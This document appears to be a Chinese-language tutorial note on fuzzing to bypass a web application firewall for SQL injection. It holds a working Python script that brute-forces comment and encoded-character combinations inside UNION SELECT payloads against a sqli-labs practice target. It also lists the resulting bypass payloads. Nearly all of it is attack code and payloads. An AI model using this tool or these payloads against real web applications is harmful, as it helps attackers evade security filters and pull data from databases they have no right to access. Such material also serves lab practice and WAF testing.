fuzz绕waf(SQL注入)
1.fuzz.py
import requests
import sys
fuzz_zs = ['/*', '*/', '/*!', '/**/', '?', '/', '*', '=', '`', '!', '%', '.', '-', '+']
fuzz_sz = ['']
fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j","%0k","%0l","%0m","%0n"]
fuzz = fuzz_zs + fuzz_sz + fuzz_ch
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36"}
url_start = "http://192.168.254.198/sqli-labs/Less-1/?id=-1'"
len = len(fuzz) ** 5
num = 0
for a in fuzz:
for b in fuzz:
for c in fuzz:
for d in fuzz:
for e in fuzz:
num += 1
payload = "/*!union/*/*!?*/%0bselect*/ 1,2,database"+a+b+c+d+e+"() --+"
url = url_start + payload
sys.stdout.write(' ' * 30 + '\r')
sys.stdout.flush()
print("Now URL:" + url)
sys.stdout.write("完成进度:%s/%s \r" % (num, len))
sys.stdout.flush()
res = requests.get(url, headers=headers)
if "Password" in res.text:
with open("Results.txt", 'a', encoding='utf-8') as r:
r.write(url + "\n")
2.payload
payload根据测试的结果依次进行更改
绕过union select:"/*!union" + a + b + c + d + e + "select*/ 1,2,3 --+"
结果:"/*!union/*/*!?*/%0bselect*/ 1,2,3 --+"
绕过database()"/*!union/*/*!?*/%0bselect*/ 1,2,database"+a+b+c+d+e+"() --+"
结果:/*!union/*/*!?*/%0bselect*/ 1,2,database/*/**//**/%0b() --+